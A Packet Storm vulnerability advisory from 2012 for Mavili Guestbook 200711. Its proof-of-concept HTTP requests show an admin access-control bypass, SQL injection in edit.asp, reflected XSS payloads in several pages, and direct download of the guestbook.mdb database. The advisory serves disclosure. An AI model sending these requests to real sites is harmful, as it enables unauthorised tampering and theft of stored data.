exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Mavili Guestbook 200711 Cross Site Scripting / SQL Injection

Mavili Guestbook 200711 Cross Site Scripting / SQL Injection
Posted Jan 3, 2012
Authored by demonalex

Mavili Guestbook version 200711 suffers from bypass, cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 7a96c95fdfcde2cd584dd9411b3e01e71dd7226c0bdd39df56803b16c1ceece5

Mavili Guestbook 200711 Cross Site Scripting / SQL Injection

Change Mirror Download
Title: mavili guestbook - SQL Injection and XSS Vulnerabilities

Software : mavili guestbook

Software Version : 200711

Vendor: http://code.google.com/p/maviliguestbook/

Vulnerability Published : 2012-01-03

Vulnerability Update Time :

Status :

Impact : High

Bug Description :
mavili guestbook(version update : 200711) is vulnerable with Security Access Control Bypass, SQL Injection, XSS, etc.

Proof Of Concept :
1)Security Access Control Bypass:
User can edit, approve and delete messages without admin permission, POC below (Remarks: id=91 exists was necessary) :
1.1)GET http://192.168.10.211/edit.asp?id=91
1.2)GET http://192.168.10.211/delete.asp?id=91
1.3)GET http://192.168.10.211/approve.asp?id=91&show=true

2)SQL Injection:
2.1)id in /edit.asp, PoC below (Remarks: id=91 exists was necessary) :
GET http://192.168.10.211/edit.asp?id=92 and 0<(select count(*) from [admin])

3)XSS:
3.1)id in /approve.asp, PoC:
GET http://192.168.10.211/approve.asp?id=<SCRipt>alert('demonalex')</scrIPT>&show=true
3.2)id in /delete.asp, PoC:
GET http://192.168.10.211/delete.asp?id=<SCRipt>alert('demonalex')</scrIPT>
3.3)id in /edit.asp, PoC:
GET http://192.168.10.211/edit.asp?id=<SCRipt>alert('demonalex')</scrIPT>
3.4)id in /edit2.asp, PoC:
POST http://192.168.10.211/edit2.asp
------------------------------------
id=<SCRipt>alert('demonalex')</scrIPT>&name=aaa&country=1&email=aaa@163.com&website=http://&submit=Send&message=aaa

4)Default Database Path:
4.1)GET http://192.168.10.211/guestbook.mdb

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    53 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close